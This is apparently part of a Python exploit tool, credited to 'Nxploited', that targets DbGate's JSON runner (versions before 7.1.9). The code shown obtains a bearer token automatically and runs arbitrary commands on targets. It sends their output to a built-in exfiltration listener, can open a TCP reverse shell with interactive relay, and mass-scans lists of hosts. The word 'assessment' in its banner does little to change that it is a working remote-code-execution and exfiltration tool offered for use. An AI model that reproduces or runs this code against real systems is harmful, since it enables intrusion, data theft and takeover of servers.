        + "  DbGate JSON Runner — Interactive Assessment".center(w)
        + Style.RESET_ALL
    )
    print(Fore.MAGENTA + "─" * w + Style.RESET_ALL)
    for line in (
        "Mode   : AUTO — one question (URL or list file), rest is automatic",
        "Auto   : token · listener · port 3000 · vector=both · output→Nx/",
        f"Output : {OUT_DIR}/  (vuln · dispatch · exfil · failed · list_report)",
        "CLI    : python Nx.py --cli -u http://host:3000  (full flags)",
        "Revsh  : --cli -u URL --reverse-shell [LHOST:LPORT]  (default LAN:4444)",
        "Note   : DbGate >= 7.1.9 is patched",
    ):
        print(Fore.CYAN + f"  • {line}" + Style.RESET_ALL)
    print(Fore.GREEN + Style.BRIGHT + "  By: Nxploited".center(w) + Style.RESET_ALL)
    print(Fore.MAGENTA + "═" * w + Style.RESET_ALL)
    print()


def ask(prompt: str, default: str = "") -> str:
    try:
        v = input(f"{Fore.CYAN}  ▸ {prompt} [{default}]: {Style.RESET_ALL}").strip()
        return v if v else default
    except (EOFError, KeyboardInterrupt):
        return default


def ask_yes(prompt: str, default: str = "n") -> bool:
    v = ask(prompt, default).lower()
    return v in ("y", "yes", "1", "true")


def ask_int(prompt: str, default: int, lo: int = 1, hi: int = 10000) -> int:
    while True:
        raw = ask(prompt, str(default))
        try:
            n = int(raw)
            if lo <= n <= hi:
                return n
        except ValueError:
            pass
        log_warn(f"Enter a number between {lo} and {hi}")


def ask_float(prompt: str, default: float, lo: float = 0.0, hi: float = 600.0) -> float:
    while True:
        raw = ask(prompt, str(default))
        try:
            n = float(raw)
            if lo <= n <= hi:
                return n
        except ValueError:
            pass
        log_warn(f"Enter a number between {lo} and {hi}")


class RunConfig:
    def __init__(self) -> None:
        self.mode: str = "single"
        self.url: str = ""
        self.targets_file: str = DEFAULT_TARGETS
        self.default_port: int = DEFAULT_PORT
        self.check_only: bool = False
        self.command: str = "id"
        self.vector: str = "functionName"
        self.token: Optional[str] = None
        self.login_json: str = '{"amoid":"none"}'
        self.login_body: Optional[Dict[str, Any]] = None
        self.threads: int = DEFAULT_CONCURRENCY
        self.timeout: float = DEFAULT_TIMEOUT
        self.verify_ssl: bool = False
        self.async_exec: bool = False
        self.b64_exfil: bool = True
        self.wait_exfil: float = 8.0
        self.use_callback: bool = True
        self.callback_url: Optional[str] = None
        self.listen_bind: str = "0.0.0.0"
        self.listen_port: int = DEFAULT_CALLBACK_PORT
        self.callback_host: str = ""
        self.use_builtin_listener: bool = True
        self.resolved_targets: List[str] = []
        self.target_commands: Dict[str, str] = {}
        self.reverse_shell: bool = False
        self.revsh_lhost: str = ""
        self.revsh_lport: int = DEFAULT_REVSH_PORT
        self.revsh_bind: str = "0.0.0.0"
        self.wait_revsh: float = 15.0
        self.revsh_interactive: bool = False
        self.mass_wait_exfil: float = 8.0


def detect_target_input(raw: str) -> Tuple[str, str, str]:
    """Return (mode, target, optional_command)."""
    raw = raw.strip()
    cmd = ""
    if not raw:
        return "single", "http://127.0.0.1:3000", ""
    if "|" in raw:
        raw, _, cmd = raw.partition("|")
        raw = raw.strip()
        cmd = cmd.strip()
    if raw.startswith("@"):
        raw = raw[1:].strip()
    looks_like_file = (
        os.path.isfile(raw)
        or (not re.match(r"^https?://", raw, re.I) and raw.endswith(".txt"))
    )
    if looks_like_file:
        return "mass", raw, cmd
    return "single", raw, cmd


def apply_auto_defaults(cfg: RunConfig) -> None:
    """Fill everything automatically — no extra questions."""
    cfg.login_body = {"amoid": "none"}
    cfg.token = None
    cfg.default_port = DEFAULT_PORT
    cfg.timeout = DEFAULT_TIMEOUT
    cfg.verify_ssl = False
    cfg.vector = "both"
    cfg.check_only = False
    cfg.command = "id"
    cfg.async_exec = False
    cfg.b64_exfil = True
    cfg.wait_exfil = 8.0
    cfg.use_callback = True
    cfg.use_builtin_listener = True
    cfg.listen_bind = "0.0.0.0"
    cfg.listen_port = DEFAULT_CALLBACK_PORT
    cfg.callback_host = guess_lan_ip()
    cfg.callback_url = build_callback_url(cfg.callback_host, cfg.listen_port)
    cfg.threads = DEFAULT_CONCURRENCY
    cfg.mass_wait_exfil = 8.0


def print_auto_summary(cfg: RunConfig) -> None:
    print()
    log_info("AUTO configuration")
    if cfg.mode == "mass":
        log_info(f"  Mode      : mass  file={cfg.targets_file}")
        log_info(f"  Threads   : {cfg.threads}")
    else:
        log_info(f"  Mode      : single  target={cfg.url}")
    log_info(f"  Auth      : POST /auth/login → Bearer (automatic)")
    log_info(f"  Command   : {cfg.command}")
    log_info(f"  Vector    : {cfg.vector}")
    log_info(f"  Callback  : {cfg.callback_url}")
    log_info(f"  Listener  : {cfg.listen_bind}:{cfg.listen_port}")
    print()


def run_wizard() -> RunConfig:
    show_banner()
    log_info("AUTO — one question (optional: URL|command  e.g. http://ip:3000|ls -la)")
    raw = ask("Target URL  or  list.txt", "http://127.0.0.1:3000")

    cfg = RunConfig()
    mode, target, opt_cmd = detect_target_input(raw)
    cfg.mode = mode

    if mode == "mass":
        cfg.targets_file = target
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file not found: {cfg.targets_file}")
            sys.exit(1)
    else:
        cfg.url = ensure_target_url(target, DEFAULT_PORT)

    apply_auto_defaults(cfg)
    if opt_cmd:
        cfg.command = opt_cmd
    print_auto_summary(cfg)
    return cfg


async def preflight_verify(cfg: RunConfig) -> bool:
    """Verify environment before any exploit attempt — abort if critical checks fail."""
    log_info("═══ Preflight verification ═══")
    init_nx_output()

    if cfg.mode == "mass":
        if not os.path.isfile(cfg.targets_file):
            log_fail(f"List file missing: {cfg.targets_file}")
            return False
        urls, per_cmds, stats, errors = load_targets_smart(
            cfg.targets_file, cfg.default_port
        )
        write_list_report(
            cfg.targets_file, stats, urls, errors,
            default_port=cfg.default_port, per_cmds=per_cmds,
        )
        cfg.resolved_targets = urls
        cfg.target_commands = per_cmds
        if per_cmds:
            log_info(f"Per-target commands: {len(per_cmds)} line(s) with |command")
        log_info(
            f"List: raw={stats.raw} resolved={stats.resolved} "
            f"dup={stats.dup} invalid={stats.invalid} → {OUT_LIST_REPORT}"
        )
        if stats.resolved == 0:
            log_fail("No valid targets after parsing list — fix list_report.txt")
            return False
        if stats.invalid > 0:
            log_warn(f"{stats.invalid} invalid lines — see {OUT_LIST_REPORT}")
    else:
        if not cfg.url:
            log_fail("No target URL")
            return False
        cfg.resolved_targets = [cfg.url]
        log_info(f"Target normalized: {cfg.url}")

    if cfg.reverse_shell and not cfg.check_only:
        log_info(
            f"Revsh: target should connect to {cfg.revsh_lhost}:{cfg.revsh_lport} "
            f"(listener bind {cfg.revsh_bind})"
        )
        if cfg.mode != "single":
            log_fail("--reverse-shell supports single target (-u) only")
            return False

    if cfg.use_callback and not cfg.check_only and not cfg.reverse_shell:
        if cfg.callback_host in ("127.0.0.1", "localhost"):
            tgt = cfg.url or (cfg.resolved_targets[0] if cfg.resolved_targets else "")
            if tgt and "127.0.0.1" not in tgt and "localhost" not in tgt:
                log_warn(
                    "Callback host is localhost but target looks remote — "
                    "exfil may fail; set LAN IP in --callback-host"
                )

    if cfg.mode == "single" and cfg.url and not cfg.token:
        log_info("Preflight: testing target reachability + auto-login...")
        if not await prefetch_token(cfg):
            log_fail("Preflight failed: cannot reach target or obtain token")
            return False

    log_ok("Preflight passed — starting scan")
    print()
    return True


async def prefetch_token(cfg: RunConfig) -> bool:
    """Fetch Bearer token before scan (single target) so user sees it succeeded."""
    if cfg.token or not cfg.url:
        return True
    login_body = cfg.login_body or {"amoid": "none"}
    client = DbGateExploit(
        cfg.url,
        timeout=cfg.timeout,
        verify_ssl=cfg.verify_ssl,
        login_body=login_body,
    )
    connector = aiohttp.TCPConnector(ssl=cfg.verify_ssl, limit=1)
    async with aiohttp.ClientSession(connector=connector) as session:
        if not await client.probe_alive(session):
            log_fail(f"[{client.tag}] cannot reach target for login")
            return False
        if not await client.obtain_token(session):
            return False
        cfg.token = client.token
        return True


def write_session_summary(cfg: RunConfig, stats: Dict[str, int]) -> None:
    doc = {
        "session": SESSION_ID,
        "mode": cfg.mode,
        "command": cfg.command,
        "vector": cfg.vector,
        "callback": cfg.callback_url,
        "reverse_shell": cfg.reverse_shell,
        "revsh_lhost": cfg.revsh_lhost,
        "revsh_lport": cfg.revsh_lport,
        "targets": cfg.resolved_targets,
        "stats": stats,
        "output_dir": os.path.abspath(OUT_DIR),
    }
    try:
        with open(OUT_SUMMARY, "w", encoding="utf-8") as fh:
            json.dump(doc, fh, indent=2)
        log_info(f"Summary → {OUT_SUMMARY}")
    except OSError:
        pass


async def run_from_config(cfg: RunConfig) -> None:
    if not await preflight_verify(cfg):
        sys.exit(1)

    exfil_srv: Optional[HTTPServer] = None
    revsh_listener: Optional[TcpRevshListener] = None
    callback_url = cfg.callback_url

    if cfg.reverse_shell and not cfg.check_only:
        if cfg.mode != "single":
            log_fail("--reverse-shell: use -u for one target only")
            sys.exit(1)
        try:
            revsh_listener = TcpRevshListener(cfg.revsh_bind, cfg.revsh_lport)
            actual_revsh_port = revsh_listener.start()
            cfg.revsh_lport = actual_revsh_port
            cfg.command = build_reverse_shell_cmd(cfg.revsh_lhost, actual_revsh_port)
            log_ok(
                f"Revsh dial address (from target): "
                f"{cfg.revsh_lhost}:{actual_revsh_port}"
            )
        except OSError as exc:
            log_fail(f"Cannot start reverse-shell listener: {exc}")
            sys.exit(1)

    if (
        cfg.use_builtin_listener
        and cfg.use_callback
        and not cfg.check_only
        and not cfg.reverse_shell
    ):
        try:
            exfil_srv, actual_port = start_exfil_server(
                cfg.listen_bind, cfg.listen_port
            )
            cfg.listen_port = actual_port
            callback_url = build_callback_url(
                cfg.callback_host or guess_lan_ip(), actual_port
            )
            cfg.callback_url = callback_url
            log_ok(f"Callback URL (target must reach this): {callback_url}")
            log_info(f"Listener bind: {cfg.listen_bind}:{actual_port}")
        except OSError as exc:
            log_fail(f"Cannot start exfil listener: {exc}")
            sys.exit(1)

    command = "" if cfg.check_only else cfg.command

    if cfg.mode == "single":
        client = DbGateExploit(
            cfg.url,
            timeout=cfg.timeout,
            verify_ssl=cfg.verify_ssl,
            token=cfg.token,
            login_body=cfg.login_body,
        )
        result = await client.full_chain(
            command=command,
            callback_url=callback_url if cfg.use_callback else None,
            vector=cfg.vector,
            check_only=cfg.check_only,
            async_exec=cfg.async_exec or cfg.reverse_shell,
            b64_exfil=cfg.b64_exfil,
            wait_exfil=cfg.wait_exfil,
            use_reverse_shell=cfg.reverse_shell,
            wait_revsh=cfg.wait_revsh,
            revsh_listener=revsh_listener,
            revsh_interactive=cfg.revsh_interactive,
        )
        stats: Dict[str, int] = {
            "exfil": 0, "dispatch": 0, "vuln": 0, "fail": 0, "revsh": 0,
        }
        stats[result] = stats.get(result, 0) + 1
        write_session_summary(cfg, stats)
        log_ok(f"Final result: {result.upper()} — {describe_result(result)}")
        if result == "exfil":
            log_ok(f"Per-target exfil → {nx_exfil_path(cfg.url)}")
        elif result == "revsh":
            if cfg.revsh_interactive:
                log_ok("Reverse TCP session ended — see Nx/revsh.txt")
            else:
                log_ok(
                    "Reverse TCP verified (connection only) — see Nx/revsh.txt; "
                    "add --revsh-interactive or use: nc -lvnp PORT"
                )
        elif result == "dispatch":
            if cfg.reverse_shell:
                log_warn(
                    "Not confirmed: no TCP reverse connection. "
                    "Use an IP reachable from DbGate (Docker: host gateway, not 127.0.0.1)."
                )
            else:
                log_warn(
                    "Not confirmed: runner accepted the job but no output hit the listener. "
                    "Try --callback-host with an IP reachable from the DbGate container."
                )
        if revsh_listener:
            revsh_listener.close()
        return

    targets = cfg.resolved_targets
    if not cfg.check_only and cfg.use_callback and not callback_url:
        log_warn("Mass mode without callback — blind dispatch only")

    log_info(
        f"Mass scan: {len(targets)} targets  threads={cfg.threads}  "
        f"vector={cfg.vector}"
    )

    stats = await mass_scan(
        targets,
        command,
        callback_url if cfg.use_callback else None,
        cfg.vector,
        cfg.check_only,
        max(1, min(cfg.threads, 200)),
        cfg.timeout,
        cfg.verify_ssl,
        cfg.token,
        cfg.login_body,
        cfg.async_exec,
        cfg.b64_exfil,
        cfg.wait_exfil if len(targets) == 1 else cfg.mass_wait_exfil,
        cfg.target_commands,
    )

    print(Fore.MAGENTA + "─" * 80 + Style.RESET_ALL)
    log_ok(
        f"Done  EXFIL={stats.get('exfil', 0)}  DISPATCH={stats.get('dispatch', 0)}  "
        f"VULN={stats.get('vuln', 0)}  FAIL={stats.get('fail', 0)}"
    )
    log_ok(f"Results in {os.path.abspath(OUT_DIR)}/")
    write_session_summary(cfg, stats)

    if exfil_srv:
        try:
            exfil_srv.shutdown()
        except Exception:
            pass
    if revsh_listener:
        revsh_listener.close()


# ── optional CLI mode (--cli) ─────────────────────────────────────────────────

def build_arg_parser() -> argparse.ArgumentParser:
    p = argparse.ArgumentParser(description="DbGate assessment — use without --cli for wizard")
    p.add_argument("--cli", action="store_true", help="Use command-line flags instead of wizard")
    p.add_argument("-u", "--url")
    p.add_argument("-f", "--file", default=DEFAULT_TARGETS)
    p.add_argument("-c", "--callback")
    p.add_argument("--cmd", "--command", dest="command", default="id")
    p.add_argument("--check-only", action="store_true")
    p.add_argument("--vector", choices=DbGateExploit.VECTORS, default="functionName")
    p.add_argument("--token")
    p.add_argument("--login-json", default='{"amoid":"none"}')
    p.add_argument("-t", "--threads", type=int, default=DEFAULT_CONCURRENCY)
    p.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    p.add_argument("--port", type=int, default=DEFAULT_PORT)
    p.add_argument("--listen-host", default="0.0.0.0")
    p.add_argument("--listen-port", type=int, default=DEFAULT_CALLBACK_PORT)
    p.add_argument("--callback-host", help="IP/hostname targets use to reach your listener")
    p.add_argument("--async-exec", action="store_true")
    p.add_argument("--no-b64", action="store_true")
    p.add_argument("--wait-exfil", type=float, default=8.0)
    p.add_argument(
        "--reverse-shell",
        nargs="?",
        const="AUTO",
        metavar="LHOST:LPORT",
        help="TCP reverse shell (single -u only). Default: guessed LAN IP:4444",
    )
    p.add_argument(
        "--revsh-bind",
        default="0.0.0.0",
        help="Local bind address for reverse-shell listener",
    )
    p.add_argument(
        "--revsh-port",
        type=int,
        default=DEFAULT_REVSH_PORT,
        help="Local port when --reverse-shell has no LHOST:LPORT (default 4444)",
    )
    p.add_argument(
        "--wait-revsh",
        type=float,
        default=15.0,
        help="Seconds to wait for reverse TCP after dispatch",
    )
    p.add_argument(
        "--revsh-interactive",
        action="store_true",
        help="After reverse TCP connect, relay stdin/stdout (basic; nc is better for TTY)",
    )
    p.add_argument(
        "--mass-wait-exfil",
        type=float,
        default=8.0,
        help="Per-target exfil wait in mass mode (default 8s; was capped at 3s)",
    )
    p.add_argument("--secure", action="store_true", help="Enable TLS certificate verification")
    return p


async def run_from_cli(args: argparse.Namespace) -> None:
    login_body, err = parse_login_json(args.login_json)
    if err:
        log_fail(err)
        sys.exit(1)

    cfg = RunConfig()
    cfg.mode = "single" if args.url else "mass"
    cfg.url = ensure_target_url(args.url, args.port) if args.url else ""
    cfg.targets_file = args.file
    cfg.default_port = args.port
    cfg.check_only = args.check_only
    cfg.command = args.command
    cfg.vector = args.vector
    cfg.token = args.token
    cfg.login_body = login_body
    cfg.threads = args.threads
    cfg.timeout = args.timeout
    cfg.verify_ssl = args.secure
    cfg.async_exec = args.async_exec
    cfg.b64_exfil = not args.no_b64
    cfg.wait_exfil = args.wait_exfil
    cfg.mass_wait_exfil = args.mass_wait_exfil
    revsh_requested = args.reverse_shell is not None
    if revsh_requested:
        if not args.url:
            log_fail("--reverse-shell requires a single target: -u http://host:3000")
            sys.exit(1)
        if args.check_only:
            log_fail("--reverse-shell cannot be used with --check-only")
            sys.exit(1)
        try:
            lhost, lport = parse_revsh_endpoint(args.reverse_shell, args.revsh_port)
        except (ValueError, OSError) as exc:
            log_fail(f"Invalid --reverse-shell endpoint: {exc}")
            sys.exit(1)
        cfg.reverse_shell = True
        cfg.revsh_lhost = args.callback_host or lhost
        cfg.revsh_lport = lport
        cfg.revsh_bind = args.revsh_bind
        cfg.wait_revsh = args.wait_revsh
        cfg.revsh_interactive = args.revsh_interactive
        cfg.use_callback = False
        cfg.use_builtin_listener = False
        cfg.async_exec = True
        cfg.command = ""  # built after listener bind in run_from_config
        log_info(f"Reverse shell mode → target dials {cfg.revsh_lhost}:{cfg.revsh_lport}")
    else:
        cfg.use_callback = bool(args.callback) or (
            not args.check_only and bool(args.command)
        )
        cfg.callback_url = args.callback
        cfg.listen_bind = args.listen_host
        cfg.listen_port = args.listen_port
        cfg.use_builtin_listener = not args.callback and not args.check_only
        if cfg.use_builtin_listener and not args.callback:
            cfg.callback_host = args.callback_host or guess_lan_ip()
            if not cfg.callback_url:
                cfg.callback_url = build_callback_url(
                    cfg.callback_host, cfg.listen_port
                )

    await run_from_config(cfg)


async def async_main() -> None:
    parser = build_arg_parser()
    args = parser.parse_args()
    if args.cli:
        show_banner()
        await run_from_cli(args)
    else:
        cfg = run_wizard()
        await run_from_config(cfg)


def main() -> None:
    try:
        asyncio.run(async_main())
    except KeyboardInterrupt:
        print()
        log_warn("Interrupted")


if __name__ == "__main__":
    main()